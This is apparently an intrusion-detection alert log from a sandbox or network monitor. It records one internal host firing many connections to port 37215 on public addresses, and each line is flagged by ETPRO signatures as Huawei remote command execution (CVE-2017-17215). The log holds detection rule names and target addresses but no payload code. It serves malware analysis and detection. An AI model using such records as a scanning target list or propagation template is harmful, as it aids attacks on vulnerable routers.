                                                        06/13/24-21:32:07.402399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5630637215192.168.2.1441.67.18.42
                                                        06/13/24-21:32:19.748582TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3370837215192.168.2.1441.16.119.223
                                                        06/13/24-21:32:52.669813TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4604237215192.168.2.14156.231.177.165
                                                        06/13/24-21:32:05.344901TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3794637215192.168.2.1441.164.253.87
                                                        06/13/24-21:33:17.310515TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4079237215192.168.2.1441.191.219.155
                                                        06/13/24-21:33:11.155026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4683837215192.168.2.14156.236.122.96
                                                        06/13/24-21:32:28.027495TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4272037215192.168.2.14197.122.77.133
                                                        06/13/24-21:32:01.220725TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3817037215192.168.2.14156.7.41.9
                                                        06/13/24-21:32:03.297440TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3606237215192.168.2.14197.151.164.204
                                                        06/13/24-21:33:09.129604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4388037215192.168.2.14156.91.138.106
                                                        06/13/24-21:31:59.197735TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5442637215192.168.2.14156.207.60.191
                                                        06/13/24-21:32:19.752244TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3650437215192.168.2.1441.209.149.213
                                                        06/13/24-21:32:48.551659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3509837215192.168.2.14197.179.144.239
                                                        06/13/24-21:33:04.988653TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3644837215192.168.2.14156.224.175.247
                                                        06/13/24-21:32:01.220283TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5406437215192.168.2.14156.51.73.140
                                                        06/13/24-21:32:11.506665TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5853637215192.168.2.14156.191.106.213
                                                        06/13/24-21:33:07.042050TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3626237215192.168.2.14156.193.238.20
                                                        06/13/24-21:32:11.485533TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3944837215192.168.2.1441.1.6.75
                                                        06/13/24-21:32:36.265554TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5953837215192.168.2.1441.44.210.33
                                                        06/13/24-21:33:11.159097TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3485837215192.168.2.14197.241.156.49
                                                        06/13/24-21:32:05.348641TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5174637215192.168.2.1441.181.237.0
                                                        06/13/24-21:32:56.755597TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4845837215192.168.2.14197.121.197.95
                                                        06/13/24-21:32:56.787976TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5121837215192.168.2.14197.91.253.211
                                                        06/13/24-21:32:07.416514TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4168037215192.168.2.14156.101.98.90
                                                        06/13/24-21:31:57.090897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5567037215192.168.2.14197.235.8.186
                                                        06/13/24-21:32:07.400798TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3326837215192.168.2.1441.249.17.89
                                                        06/13/24-21:33:04.989586TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5814237215192.168.2.14156.23.28.12
                                                        06/13/24-21:33:11.176784TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3881637215192.168.2.14156.224.55.80
                                                        06/13/24-21:32:03.310251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3826437215192.168.2.14197.203.105.230
                                                        06/13/24-21:32:03.279278TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5545237215192.168.2.14156.71.135.100
                                                        06/13/24-21:32:32.169634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4790837215192.168.2.14197.85.21.152
                                                        06/13/24-21:32:17.676846TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3964637215192.168.2.1441.165.139.129
                                                        06/13/24-21:32:11.489024TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5462237215192.168.2.1441.130.52.18
                                                        06/13/24-21:32:52.676572TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5372237215192.168.2.14197.163.98.27
                                                        06/13/24-21:32:15.630211TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4855837215192.168.2.1441.202.54.104
                                                        06/13/24-21:32:23.940700TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5411837215192.168.2.1441.100.119.59
                                                        06/13/24-21:32:36.246618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5876437215192.168.2.1441.84.17.77
                                                        06/13/24-21:33:09.087750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5056437215192.168.2.14197.231.48.210
                                                        06/13/24-21:32:46.525963TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5694237215192.168.2.14197.106.2.103
                                                        06/13/24-21:32:30.091741TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4055837215192.168.2.14156.241.49.0
                                                        06/13/24-21:32:44.451258TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4684237215192.168.2.14197.35.139.132
                                                        06/13/24-21:33:13.229080TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5173837215192.168.2.14156.220.174.96
                                                        06/13/24-21:31:57.091597TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3414837215192.168.2.14197.253.168.147
                                                        06/13/24-21:33:15.272132TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4967637215192.168.2.14197.48.183.216
                                                        06/13/24-21:32:58.839495TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4529037215192.168.2.14197.46.0.227
                                                        06/13/24-21:32:09.436421TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3794437215192.168.2.14197.24.239.250
                                                        06/13/24-21:32:38.317636TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5663437215192.168.2.1441.105.188.140
                                                        06/13/24-21:32:34.212973TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4949037215192.168.2.14156.218.18.189
                                                        06/13/24-21:32:52.680759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4351037215192.168.2.14197.87.124.48
                                                        06/13/24-21:33:15.256940TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3737837215192.168.2.1441.178.238.126
                                                        06/13/24-21:32:01.238528TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3887237215192.168.2.14156.11.233.227
                                                        06/13/24-21:32:46.502018TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5913437215192.168.2.14197.181.159.189
                                                        06/13/24-21:32:58.822931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5310237215192.168.2.1441.220.211.46
                                                        06/13/24-21:32:13.543980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4958637215192.168.2.14197.153.187.83
                                                        06/13/24-21:32:42.403934TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5394837215192.168.2.14156.237.131.86
                                                        06/13/24-21:32:01.224061TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3849237215192.168.2.1441.3.27.154
                                                        06/13/24-21:32:05.368983TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4631837215192.168.2.1441.167.197.169
                                                        06/13/24-21:32:44.476249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5528637215192.168.2.14156.202.38.168
                                                        06/13/24-21:32:17.678529TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4860237215192.168.2.14156.249.175.61
                                                        06/13/24-21:32:44.452207TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5600837215192.168.2.1441.235.31.42
                                                        06/13/24-21:32:52.669252TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4173437215192.168.2.1441.142.39.66
                                                        06/13/24-21:32:30.095292TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3599637215192.168.2.14197.146.245.205
                                                        06/13/24-21:32:34.191432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5074437215192.168.2.1441.158.216.107
                                                        06/13/24-21:32:36.263803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3995037215192.168.2.14156.0.95.186
                                                        06/13/24-21:32:23.933902TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4788437215192.168.2.1441.36.168.130
                                                        06/13/24-21:32:58.824477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3819237215192.168.2.14197.216.64.60
                                                        06/13/24-21:32:32.164575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5553637215192.168.2.14156.177.236.23
                                                        06/13/24-21:32:23.834441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3938237215192.168.2.1441.9.53.28
                                                        06/13/24-21:32:32.156564TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3367037215192.168.2.1441.27.160.2
                                                        06/13/24-21:32:30.098823TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4798237215192.168.2.14197.52.212.29
                                                        06/13/24-21:33:09.108284TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4654637215192.168.2.14197.40.204.20
                                                        06/13/24-21:32:48.569899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6046837215192.168.2.14156.217.234.103
                                                        06/13/24-21:31:59.195012TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3769437215192.168.2.14197.15.134.113
                                                        06/13/24-21:32:19.730803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3762437215192.168.2.14156.129.25.116
                                                        06/13/24-21:32:23.943474TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5716837215192.168.2.1441.109.58.28
                                                        06/13/24-21:33:05.014289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4935637215192.168.2.14156.237.5.109
                                                        06/13/24-21:31:59.198270TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5810037215192.168.2.1441.26.181.224
                                                        06/13/24-21:33:02.938022TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5061437215192.168.2.1441.130.30.204
                                                        06/13/24-21:33:09.088671TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4774837215192.168.2.14156.213.118.69
                                                        06/13/24-21:32:01.223900TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5841637215192.168.2.1441.13.134.169
                                                        06/13/24-21:32:38.298538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4048037215192.168.2.14156.255.58.247
                                                        06/13/24-21:32:01.237890TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4090637215192.168.2.1441.152.186.219
                                                        06/13/24-21:32:11.509916TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3340637215192.168.2.1441.233.7.74
                                                        06/13/24-21:32:32.170805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5712637215192.168.2.14156.171.13.248
                                                        06/13/24-21:32:32.150879TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4458437215192.168.2.1441.213.185.69
                                                        06/13/24-21:33:11.174531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4083637215192.168.2.14197.135.217.165
                                                        06/13/24-21:32:11.505526TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4422837215192.168.2.14156.225.255.132
                                                        06/13/24-21:32:03.274005TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3867637215192.168.2.1441.11.229.119
                                                        06/13/24-21:33:13.228184TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4862237215192.168.2.14156.14.104.130
                                                        06/13/24-21:33:00.868309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3708437215192.168.2.14156.207.243.148
                                                        06/13/24-21:32:03.280074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4562237215192.168.2.1441.117.110.130
                                                        06/13/24-21:32:21.782377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3953237215192.168.2.14156.202.144.21
                                                        06/13/24-21:32:07.401003TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3759637215192.168.2.14197.37.189.130
                                                        06/13/24-21:32:05.345419TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4702437215192.168.2.14197.115.95.222
                                                        06/13/24-21:32:46.524903TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3386637215192.168.2.14156.121.45.56
                                                        06/13/24-21:32:19.729996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4585437215192.168.2.1441.181.197.148
                                                        06/13/24-21:32:40.372966TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4018637215192.168.2.1441.234.27.130
                                                        06/13/24-21:32:44.476607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5832237215192.168.2.1441.218.76.72
                                                        06/13/24-21:32:32.170531TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3978637215192.168.2.14156.209.138.11
                                                        06/13/24-21:32:50.633218TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5923837215192.168.2.1441.125.233.172
                                                        06/13/24-21:33:05.016642TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3760837215192.168.2.14156.176.247.139
                                                        06/13/24-21:32:34.193123TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4934637215192.168.2.1441.244.167.153
                                                        06/13/24-21:31:57.091365TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5535237215192.168.2.14156.190.186.17
                                                        06/13/24-21:32:46.503025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5182237215192.168.2.1441.39.237.38
                                                        06/13/24-21:32:42.423274TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4837037215192.168.2.14156.215.13.34
                                                        06/13/24-21:33:00.868792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3714437215192.168.2.1441.124.29.108
                                                        06/13/24-21:31:57.132450TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6057237215192.168.2.1441.117.10.40
                                                        06/13/24-21:32:30.079117TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4412037215192.168.2.1441.157.197.117
                                                        06/13/24-21:32:42.406488TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4410037215192.168.2.1441.103.41.234
                                                        06/13/24-21:32:30.077294TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4254237215192.168.2.14197.42.75.93
                                                        06/13/24-21:32:58.842774TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4235637215192.168.2.1441.110.169.112
                                                        06/13/24-21:32:54.710703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3398237215192.168.2.1441.32.71.101
                                                        06/13/24-21:32:40.354882TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4839637215192.168.2.14156.114.28.203
                                                        06/13/24-21:32:46.501687TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5237037215192.168.2.14197.108.176.70
                                                        06/13/24-21:33:09.091281TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3503437215192.168.2.14156.72.215.114
                                                        06/13/24-21:32:25.970977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5818237215192.168.2.14197.7.216.136
                                                        06/13/24-21:32:25.972595TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3576237215192.168.2.14197.137.197.235
                                                        06/13/24-21:32:25.974399TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3619237215192.168.2.14197.48.67.77
                                                        06/13/24-21:32:38.317297TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5388237215192.168.2.14156.52.39.12
                                                        06/13/24-21:33:17.309717TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4734037215192.168.2.14156.166.12.216
                                                        06/13/24-21:31:59.176476TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4011437215192.168.2.1441.165.223.247
                                                        06/13/24-21:31:59.174810TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3575237215192.168.2.1441.225.65.168
                                                        06/13/24-21:32:40.353756TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4155237215192.168.2.14197.116.243.216
                                                        06/13/24-21:32:13.568294TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5398837215192.168.2.14156.190.142.19
                                                        06/13/24-21:32:15.633402TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4979237215192.168.2.14156.161.20.252
                                                        06/13/24-21:33:02.911261TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5288437215192.168.2.14156.106.183.29
                                                        06/13/24-21:32:42.408616TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4092837215192.168.2.14156.153.146.234
                                                        06/13/24-21:31:59.198018TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4354037215192.168.2.14197.122.188.250
                                                        06/13/24-21:32:17.671354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5071837215192.168.2.1441.240.165.198
                                                        06/13/24-21:31:57.133452TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3470837215192.168.2.1441.115.70.80
                                                        06/13/24-21:32:38.322209TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4134437215192.168.2.14197.103.7.6
                                                        06/13/24-21:31:57.092692TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3752837215192.168.2.14156.21.179.125
                                                        06/13/24-21:32:01.239629TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3473637215192.168.2.1441.133.157.144
                                                        06/13/24-21:32:32.154069TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4820237215192.168.2.14156.187.42.33
                                                        06/13/24-21:33:07.042778TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5915037215192.168.2.14197.108.145.156
                                                        06/13/24-21:33:11.175941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3738637215192.168.2.14156.24.60.198
                                                        06/13/24-21:32:15.636269TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3788437215192.168.2.14197.225.247.94
                                                        06/13/24-21:32:56.791575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3624037215192.168.2.1441.183.4.194
                                                        06/13/24-21:32:07.417263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4130837215192.168.2.1441.111.122.100
                                                        06/13/24-21:32:42.418492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4390637215192.168.2.1441.87.177.92
                                                        06/13/24-21:33:07.038353TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4246837215192.168.2.1441.202.98.12
                                                        06/13/24-21:33:00.872529TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4790237215192.168.2.14197.81.63.78
                                                        06/13/24-21:32:17.675946TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3618237215192.168.2.14156.145.251.118
                                                        06/13/24-21:32:58.820824TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3570837215192.168.2.14156.122.169.226
                                                        06/13/24-21:33:00.871151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5066437215192.168.2.14197.8.17.85
                                                        06/13/24-21:33:11.174738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5618037215192.168.2.14197.253.35.101
                                                        06/13/24-21:31:57.133853TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4016837215192.168.2.14156.88.160.161
                                                        06/13/24-21:32:21.780350TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4990037215192.168.2.14197.32.167.227
                                                        06/13/24-21:33:09.109393TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5842037215192.168.2.14156.155.95.164
                                                        06/13/24-21:32:38.320210TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3533637215192.168.2.1441.246.187.205
                                                        06/13/24-21:32:36.248431TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4275637215192.168.2.14156.168.190.45
                                                        06/13/24-21:32:46.509312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4073637215192.168.2.14197.128.85.20
                                                        06/13/24-21:32:38.323377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4505037215192.168.2.1441.26.190.186
                                                        06/13/24-21:31:57.091258TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5460237215192.168.2.1441.0.201.93
                                                        06/13/24-21:33:07.059607TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3486637215192.168.2.1441.39.212.219
                                                        06/13/24-21:32:21.783269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4780837215192.168.2.14156.227.194.40
                                                        06/13/24-21:32:07.404570TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3528637215192.168.2.1441.108.70.185
                                                        06/13/24-21:32:50.633274TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3799637215192.168.2.1441.144.36.197
                                                        06/13/24-21:32:30.098143TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5827837215192.168.2.14156.183.89.253
                                                        06/13/24-21:32:38.304092TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4128237215192.168.2.1441.243.232.47
                                                        06/13/24-21:32:42.423499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6055437215192.168.2.14156.104.114.150
                                                        06/13/24-21:33:02.912761TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3646037215192.168.2.1441.100.28.120
                                                        06/13/24-21:32:38.303519TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4202437215192.168.2.1441.124.198.243
                                                        06/13/24-21:32:03.305444TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5872637215192.168.2.14156.100.135.200
                                                        06/13/24-21:31:59.175424TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3428437215192.168.2.14197.3.237.232
                                                        06/13/24-21:33:07.041828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4429237215192.168.2.14197.135.122.147
                                                        06/13/24-21:32:48.567421TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6081237215192.168.2.14156.62.6.49
                                                        06/13/24-21:33:00.889862TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4532837215192.168.2.14197.182.168.78
                                                        06/13/24-21:32:01.223635TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4591637215192.168.2.1441.79.12.106
                                                        06/13/24-21:32:01.248901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5653837215192.168.2.14156.0.64.228
                                                        06/13/24-21:32:21.786947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5916837215192.168.2.14156.131.126.45
                                                        06/13/24-21:31:59.175054TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5331237215192.168.2.14156.51.67.83
                                                        06/13/24-21:32:58.824760TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3362237215192.168.2.1441.82.206.6
                                                        06/13/24-21:32:30.128917TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5326837215192.168.2.14156.92.49.228
                                                        06/13/24-21:32:17.677187TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4172237215192.168.2.1441.211.45.201
                                                        06/13/24-21:31:59.200200TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5952237215192.168.2.14156.93.196.251
                                                        06/13/24-21:32:58.839495TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4529037215192.168.2.14197.46.0.227
                                                        06/13/24-21:32:03.306547TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4491237215192.168.2.14197.31.28.209
                                                        06/13/24-21:32:30.126206TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5768237215192.168.2.1441.218.26.122
                                                        06/13/24-21:33:17.340972TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4764437215192.168.2.14197.172.3.223
                                                        06/13/24-21:32:46.503232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5158037215192.168.2.14197.29.54.159
                                                        06/13/24-21:33:09.085536TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3838037215192.168.2.1441.236.218.140
                                                        06/13/24-21:32:30.079927TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4913437215192.168.2.14156.219.250.221
                                                        06/13/24-21:32:40.379739TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3346837215192.168.2.14156.218.105.224
                                                        06/13/24-21:32:42.409626TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4021437215192.168.2.14156.53.63.249
                                                        06/13/24-21:32:30.075531TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3873037215192.168.2.14197.169.146.39
